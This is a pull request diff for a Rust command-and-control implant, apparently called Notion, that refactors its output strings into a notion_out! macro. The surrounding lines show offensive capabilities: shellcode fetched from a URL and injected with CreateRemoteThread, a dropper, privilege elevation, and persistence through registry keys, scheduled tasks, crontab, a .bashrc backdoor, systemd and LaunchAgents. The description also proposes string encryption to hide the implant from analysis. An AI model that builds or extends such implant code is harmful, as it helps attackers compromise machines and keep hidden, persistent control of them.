### PR TITLE
notion_out macro

### DIFF
--- a/agent/src/cmd/cd.rs
+++ b/agent/src/cmd/cd.rs
@@ -1,7 +1,7 @@
 use std::error::Error;
 use std::path::Path;
 use std::env::set_current_dir;
-use crate::cmd::CommandArgs;
+use crate::cmd::{CommandArgs, notion_out};
 
 /// Changes the directory using system tools
 /// Rather than the shell
@@ -9,8 +9,8 @@ pub fn handle(cmd_args: &mut CommandArgs) -> Result<String, Box<dyn Error>> {
     let path_arg = cmd_args.nth(0).unwrap_or_else(|| ".".to_string());
     let new_path = Path::new(&path_arg);
     match set_current_dir(new_path) {
-        Ok(_) => Ok(format!("Changed to {path_arg}").to_string()),
-        Err(e) => Ok(e.to_string())
+        Ok(_) => notion_out!("Changed to {path_arg}"),
+        Err(e) => notion_out!("{e}")
     }
 }
 

--- a/agent/src/cmd/download.rs
+++ b/agent/src/cmd/download.rs
@@ -2,7 +2,7 @@ use std::error::Error;
 use std::io::copy;
 use reqwest::Client;
 use std::fs::File;
-use crate::cmd::CommandArgs;
+use crate::cmd::{CommandArgs, notion_out};
 use crate::logger::Logger;
 
 /// Downloads a file to the local system.
@@ -21,11 +21,11 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
     if r.status().is_success() {
         if let Ok(mut out_file) = File::create(&path) {
             match copy(&mut r.bytes().await?.as_ref(), &mut out_file) {
-                Ok(b)  => { return Ok(format!("{b} bytes written to {path}").to_string());},
-                Err(_) => { return Ok("Could not write file".to_string()); }
+                Ok(b)  => { return notion_out!("{b} bytes written to {path}");},
+                Err(_) => { return notion_out!("Could not write file"); }
             }
         } else {
-            return Ok("Could not write file".to_string());
+            return notion_out!("Could not write file");
         }
     }
     Ok(r.text().await?)

--- a/agent/src/cmd/elevate.rs
+++ b/agent/src/cmd/elevate.rs
@@ -2,7 +2,7 @@ use std::error::Error;
 use sysinfo::{System, SystemExt, UserExt};
 use whoami::username;
 use crate::config::ConfigOptions;
-use crate::cmd::CommandArgs;
+use crate::cmd::{CommandArgs, notion_out};
 use std::env::args;
 use std::process::Command;
 #[cfg(windows)] use std::env::{var};
@@ -57,7 +57,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                     let pwd = cmd_args.nth(0).unwrap();
                     // Check for empty pw
                     if pwd.is_empty() {
-                        return Ok("Need a sudo password!".to_string());
+                        return notion_out!("Need a sudo password!");
                     }
                     let encoded_config = config_options.to_base64();
                     let agent_path = args().nth(0).unwrap();
@@ -66,9 +66,9 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                     .arg("-c")
                     .arg(cmd_string)
                     .spawn()?;
-                    Ok("Elevation attempted. Look for the new agent!".to_string())
+                    notion_out!("Elevation attempted. Look for the new agent!")
             }
-                _ => Ok("Unknown elevation method".to_string())
+                _ => notion_out!("Unknown elevation method")
             }
         }
 
@@ -107,24 +107,24 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                                     std::time::Duration::from_secs(1);
                                     std::thread::sleep(sleep_time);
                                 }
-                                Ok("Elevation attempted. Look for the new agent!".to_string())
+                                notion_out!("Elevation attempted. Look for the new agent!")
                             },
                             Err(e) => { return Ok(e.to_string())}
                         }  
                     } else {
-                        Ok("Couldn't get APPDATA location".to_string())
+                        notion_out!("Couldn't get APPDATA location")
                     }
 
                     
 
                 }
                 _ => {
-                    Ok("Elevation unavailable".to_string())
+                    notion_out!("Elevation unavailable")
                 }
             }
         }
 
     } else {
-        Ok("Elevation unavailable".to_string())
+        notion_out!("Elevation unavailable")
     }
 }

--- a/agent/src/cmd/getprivs.rs
+++ b/agent/src/cmd/getprivs.rs
@@ -1,5 +1,6 @@
 use std::error::Error;
 use is_root::is_root;
+use crate::cmd::notion_out;
 
 #[cfg(windows)] use std::ptr::null_mut;
 #[cfg(windows)] use winapi::um::handleapi::CloseHandle;
@@ -53,6 +54,6 @@ pub async fn handle() -> Result<String, Box<dyn Error>> {
     // TODO: Implement Linux check
     let is_admin = is_elevated();  
     println!("{}", is_admin);
-    Ok(String::from(format!("Admin Context: {is_admin}").to_string()))
+    notion_out!("Admin Context: {is_admin}")
     
 }

--- a/agent/src/cmd/inject.rs
+++ b/agent/src/cmd/inject.rs
@@ -1,6 +1,6 @@
 use std::error::Error;
 use crate::logger::Logger;
-use crate::cmd::CommandArgs;
+use crate::cmd::{CommandArgs, notion_out};
 
 use base64::decode as b64_decode;
 #[cfg(windows)] extern crate winapi;
@@ -148,7 +148,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                 logger.debug(format!("Shellcode URL: {}", &u));
                 url = u; 
             },
-            None    => { return Ok("Could not parse URL".to_string()); }
+            None    => { return notion_out!("Could not parse URL"); }
         };
 
         // Get b64_iterations
@@ -157,10 +157,10 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                 if let Ok(b) = bs.parse::<u32>() {
                     b64_iterations = b;
                 } else {
-                    return Ok("Could not parse b64 iterations".to_string());
+                    return notion_out!("Could not parse b64 iterations");
                 }
             },
-            None => { return Ok("Could not extract b64 iterations".to_string()); }
+            None => { return notion_out!("Could not extract b64 iterations"); }
         };
 
         // CALL get_shellcode
@@ -190,7 +190,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                                 let _h_thread = kernel32::CreateRemoteThread(h, ptr::null_mut(), 0 , Some(std::mem::transmute(addr)), ptr::null_mut(), 0, ptr::null_mut());
                                 kernel32::CloseHandle(h);
                             }
-                            return Ok("Injection completed!".to_string());
+                            return notion_out!("Injection completed!");
                         } else {
                             let err_msg = "Could not parse PID";
                             logger.err(err_msg.to_string());
@@ -287,14 +287,14 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                     //}
                 }
 
-                return Ok("Injection completed!".to_string());
+                return notion_out!("Injection completed!");
                 
             },
-            _ => Ok("Unknown injection type!".to_string())
+            _ => notion_out!("Unknown injection type!")
         }
 
     } else {
-        return Ok("Could not parse URL".to_string());
+        return notion_out!("Could not parse URL");
     }
     
          
@@ -324,7 +324,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                         logger.debug(format!("Shellcode URL: {u}"));
                         url = u; 
                     },
-                    None => { return Ok("Could not parse URL".to_string()); }
+                    None => { return notion_out!("Could not parse URL"); }
                 };
 
                 // Get filename
@@ -333,7 +333,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                         logger.debug(format!("Filename: {f}"));
                         filename = f; 
                     },
-                    None => { return Ok("Could not parse filename".to_string()); }
+                    None => { return notion_out!("Could not parse filename"); }
                 };
 
                 let mut download_args = CommandArgs::from_string(
@@ -362,17 +362,17 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                     .arg(cmd_string)
                     .spawn()?;
 
-                Ok("Dropper completed!".to_string())
+                notion_out!("Dropper completed!")
             }
-            _ => { return Ok("Unknown injection method!".to_string()) ;}
+            _ => { return notion_out!("Unknown injection method!") ;}
         }
 
     } else {
-        return Ok("No injection type provided!".to_string());
+        return notion_out!("No injection type provided!");
     }
 }
 
 #[cfg(macos)]
 pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<String, Box<dyn Error>> {
-    Ok("Inject not available on macOS!".to_string())
+    notion_out!("Inject not available on macOS!")
 }

--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -26,6 +26,13 @@ mod whoami;
 mod unknown;
 mod selfdestruct;
 
+macro_rules! notion_out {
+    ($s:literal) => {
+        Ok(format!($s).to_string())
+    };
+}
+pub(crate) use notion_out;
+
 /// All the possible command types. Some have command strings, and some don't.
 pub enum CommandType {
     Cd,

--- a/agent/src/cmd/persist.rs
+++ b/agent/src/cmd/persist.rs
@@ -1,7 +1,7 @@
 use std::error::Error;
 use std::env::{var, args};
 use is_root::is_root;
-use crate::cmd::{CommandArgs, shell, save};
+use crate::cmd::{CommandArgs, shell, save, notion_out};
 #[cfg(not(windows))] use std::fs::{create_dir, copy, write};
 #[cfg(windows)] use std::path::Path;
 #[cfg(windows)] use winreg::{RegKey};
@@ -42,7 +42,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                         Err(e) => { return Ok(e.to_string())}
                     }
                 } else {
-                    return Ok("Couldn't get APPDATA location".to_string());
+                    return notion_out!("Couldn't get APPDATA location");
                 };
             },
             "registry" => {
@@ -61,9 +61,9 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                         REG_OPENED_EXISTING_KEY => logger.info("An existing key has been opened".to_string()),
                     };
                     key.set_value("Notion", &persist_path)?;
-                    Ok("Persistence accomplished".to_string())
+                    notion_out!("Persistence accomplished")
                 } else {
-                    Ok("LOCALDATA undefined".to_string())
+                    notion_out!("LOCALDATA undefined")
                 }
             },
             "wmic" => {
@@ -112,11 +112,11 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                         }
                 
                     } else {
-                        return Ok("Could not locate APPDATA.".to_string());
+                        return notion_out!("Could not locate APPDATA.");
                     }
                 }
                 else{
-                    return Ok("[-] WMIC persistence requires admin privileges.".to_string());
+                    return notion_out!("[-] WMIC persistence requires admin privileges.");
                 }
             },
             "schtasks" => {
@@ -163,17 +163,17 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                         }
                 
                     } else {
-                        return Ok("Could not locate APPDATA.".to_string());
+                        return notion_out!("Could not locate APPDATA.");
                     }
                 }
                 else{
-                    return Ok("[-] Scheduled task persistence requires admin privileges.".to_string());
+                    return notion_out!("[-] Scheduled task persistence requires admin privileges.");
                 }
             },
 
 
 
-            _ => Ok("That's not a persistence method!".to_string())
+            _ => notion_out!("That's not a persistence method!")
         }
     }
 
@@ -201,12 +201,12 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                         format!("(crontab -l 2>/dev/null; echo '{cron_string}') | crontab - ")
                     );
                     if let Ok(_) = shell::handle(&mut cron_args).await {
-                        Ok("Cronjob added!".to_string())
+                        notion_out!("Cronjob added!")
                     } else {
-                        Ok("Could not make cronjob".to_string())
+                        notion_out!("Could not make cronjob")
                     }
                 } else {
-                    Ok("Could not copy app to destination".to_string())
+                    notion_out!("Could not copy app to destination")
                 }
             }
             "bashrc"  => {
@@ -223,12 +223,12 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                         vec![format!("echo '{app_dir}/notion -b {b64_config} & disown' >> ~/.bashrc ")]
                     );
                     if let Ok(_) = shell::handle(&mut bashrc_args).await {
-                        Ok("Bash Backdoored!".to_string())
+                        notion_out!("Bash Backdoored!")
                     } else {
-                        Ok("Could not modify bashrc".to_string())
+                        notion_out!("Could not modify bashrc")
                     }
                 } else {
-                    Ok("Could not copy app to destination".to_string())
+                    notion_out!("Could not copy app to destination")
                 }
             },
             "service" => {
@@ -262,13 +262,13 @@ WantedBy=multi-user.target"
                         );
                         return shell::handle(&mut systemd_args).await;
                     } else {
-                        return Ok("Could not copy service file".to_string());
+                        return notion_out!("Could not copy service file");
                     }
                 } else {
-                    return Ok("Need to be root first. Try elevate.".to_string());
+                    return notion_out!("Need to be root first. Try elevate.");
                 }
             }, 
-            _         => Ok("Unknown persistence method!".to_string())
+            _         => notion_out!("Unknown persistence method!")
         }
     }
 
@@ -295,12 +295,12 @@ WantedBy=multi-user.target"
                         vec![osascript_string]
                     );
                     if let Ok(_) = shell::handle(&mut applescript_args).await {
-                        Ok("Login item created!".to_string())
+                        notion_out!("Login item created!")
                     } else {
-                        Ok("Could not create login item".to_string())
+                        notion_out!("Could not create login item")
                     }
                 } else {
-                    Ok("Could not copy app to destination".to_string())
+                    notion_out!("Could not copy app to destination")
                 }
 
             },
@@ -344,10 +344,10 @@ r#"<?xml version="1.0" encoding="UTF-8"?>
                     )?;
                     Ok(format!("LaunchAgent written to {launch_agent_dir}"))
                 } else {
-                    return Ok("Could not copy app to destination".to_string());
+                    return notion_out!("Could not copy app to destination");
                 }
             },
-            _ => Ok("Unknown persistence method!".to_string())
+            _ => notion_out!("Unknown persistence method!")
         }
 
     }

--- a/agent/src/cmd/portscan.rs
+++ b/agent/src/cmd/portscan.rs
@@ -7,7 +7,7 @@ use cidr_utils::cidr::IpCidr;
 use tokio::net::TcpStream;
 use tokio::sync::mpsc::channel;
 use crate::logger::Logger;
-use crate::cmd::CommandArgs;
+use crate::cmd::{CommandArgs, notion_out};
 
 
 /// Common ports to scan.
@@ -140,7 +140,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
 
         // Safety check for concurrency
         if concurrent <= 0 {
-            return Ok("Concurrency value must be greater than 0!".to_string());
+            return notion_out!("Concurrency value must be greater than 0!");
         }
         
         let timeout: u64 = args[3].parse::<u64>().unwrap_or_else(|_| 1000);

--- a/agent/src/cmd/pwd.rs
+++ b/agent/src/cmd/pwd.rs
@@ -1,10 +1,11 @@
 use std::error::Error;
 use std::env::current_dir;
+use crate::cmd::notion_out;
 
 /// Prints working directory.
 pub async fn handle() -> Result<String, Box<dyn Error>> {
     match current_dir() {
         Ok(b) => Ok(String::from(b.to_str().unwrap())),
-        Err(e) => Ok(format!("{e}").to_string())
+        Err(e) => notion_out!("{e}")
     }
 }

--- a/agent/src/cmd/save.rs
+++ b/agent/src/cmd/save.rs
@@ -2,7 +2,7 @@ use std::error::Error;
 use std::fs::write;
 use serde_json::to_string as json_to_string;
 // use relative_path::RelativePath;
-use crate::cmd::{CommandArgs, ConfigOptions};
+use crate::cmd::{CommandArgs, ConfigOptions, notion_out};
 
 /// Saves the agent to the given path.
 /// 
@@ -12,7 +12,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
     config_options.config_file_path = save_path.to_owned();
     // let write_path = RelativePath::new(config_options.config_file_path.as_str());
     match write(&config_options.config_file_path, json_to_string(config_options)?) {
-        Ok(_) => Ok(format!("Config file saved to {save_path}").to_string()),
-        Err(e) => Ok(format!("{e}"))
+        Ok(_) => notion_out!("Config file saved to {save_path}"),
+        Err(e) => notion_out!("{e}")
     }
 }

--- a/agent/src/cmd/selfdestruct.rs
+++ b/agent/src/cmd/selfdestruct.rs
@@ -4,6 +4,7 @@ use std::fs::remove_file;
 #[cfg(windows)] use houdini;
 #[cfg(windows)] use rand::{thread_rng, Rng};
 #[cfg(windows)] use rand::distributions::Alphanumeric;
+use crate::cmd::notion_out;
 
 
 pub async fn handle() -> Result<String, Box<dyn Error>> {
@@ -34,5 +35,5 @@ pub async fn handle() -> Result<String, Box<dyn Error>> {
 
         // Shutdown agent
         // In main.rs, shutdown::handle exits the current running process
-        Ok("[!] This agent will now self-destruct!\n[!] 3...2...1...💣💥!".to_string())
+        notion_out!("[!] This agent will now self-destruct!\n[!] 3...2...1...💣💥!")
 }

--- a/agent/src/cmd/shell.rs
+++ b/agent/src/cmd/shell.rs
@@ -42,5 +42,5 @@ pub async fn handle(cmd_args: &mut CommandArgs) -> Result<String, Box<dyn Error>
     } else {
         output_string = String::from_utf8(output.stdout).unwrap();
     }
-    return Ok(output_string);
+    Ok(output_string)
 }

--- a/agent/src/cmd/shutdown.rs
+++ b/agent/src/cmd/shutdown.rs
@@ -1,6 +1,7 @@
 use std::error::Error;
+use crate::cmd::notion_out;
 
 /// Kills the agent.
 pub async fn handle() -> Result<String, Box<dyn Error>> {
-    Ok("Shutting down".to_string())
+    notion_out!("Shutting down")
 }

--- a/agent/src/cmd/sleep.rs
+++ b/agent/src/cmd/sleep.rs
@@ -1,5 +1,5 @@
 use std::error::Error;
-use crate::cmd::{CommandArgs, ConfigOptions};
+use crate::cmd::{CommandArgs, ConfigOptions, notion_out};
 
 /// Modifies the sleep and jitter times
 /// 
@@ -17,5 +17,5 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
         .unwrap_or_else(|_| config_options.jitter_time);
     config_options.sleep_interval = sleep_interval;
     config_options.jitter_time = jitter_time;
-    Ok(format!("[+] Sleep time: {sleep_interval}, Jitter time: {jitter_time}"))
+    notion_out!("[+] Sleep time: {sleep_interval}, Jitter time: {jitter_time}")
 }

--- a/agent/src/cmd/unknown.rs
+++ b/agent/src/cmd/unknown.rs
@@ -1,6 +1,7 @@
 use std::error::Error;
+use crate::cmd::notion_out;
 
 /// Handles any weirdo commands that can't be interpreted.
 pub async fn handle() -> Result<String, Box<dyn Error>> {
-    Ok("[-] Unknown command type".to_string())
+    notion_out!("[-] Unknown command type")
 }


### PR DESCRIPTION
Introducing the `notion_out!` macro!

Instead of `Ok("some message".to_string())` all over the place, this macro improves the ergonomics of writing agent output.

I'm also pretty sure if we do use litcrypt, it means we only have to use it in one place.